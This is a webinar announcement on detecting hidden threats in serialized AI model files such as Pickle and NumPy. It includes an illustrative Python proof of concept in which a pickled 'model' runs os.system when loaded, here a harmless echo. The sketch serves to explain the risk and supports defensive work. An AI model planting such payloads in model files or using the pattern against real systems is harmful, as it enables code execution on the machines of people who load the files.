
Wednesday, March 18 @ 1-2pm ET
Building Trustworthy AI
Detecting Hidden Threats in AI Models Before They Strike
The models you build and distribute are the new frontier for sophisticated, hard-to-detect attacks.
As a foundation model provider, you have a non-negotiable responsibility to secure your core artifacts and the platforms that host them. These artifacts sit at the foundation of the AI stack and are a potent attack vector, with threats often hidden within serialized model formats such as Pickle or NumPy files.
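As a rough illustration of why serialized model formats carry this risk (this sketch is not material from the webinar; the file name and payload are hypothetical), a pickled "model" can embed code that executes the moment it is deserialized:

```python
import os
import pickle

# Illustrative only: a pickle payload can smuggle arbitrary code
# that runs during deserialization, before any weights are used.
class MaliciousPayload:
    def __reduce__(self):
        # pickle calls os.system(...) while loading this object
        return (os.system, ("echo 'attacker code executes on load'",))

# The attacker distributes this file as if it were a trained model...
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# ...and the payload fires as soon as a consumer loads it.
with open("model.pkl", "rb") as f:
    pickle.load(f)  # executes the embedded command
```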
Join ReversingLabs to learn how to detect and neutralize these threats before they ever reach your customers.
In this webinar, we will explore:
Attendees will receive a certificate of attendance that can be applied toward CPE credit.
Meet the Speakers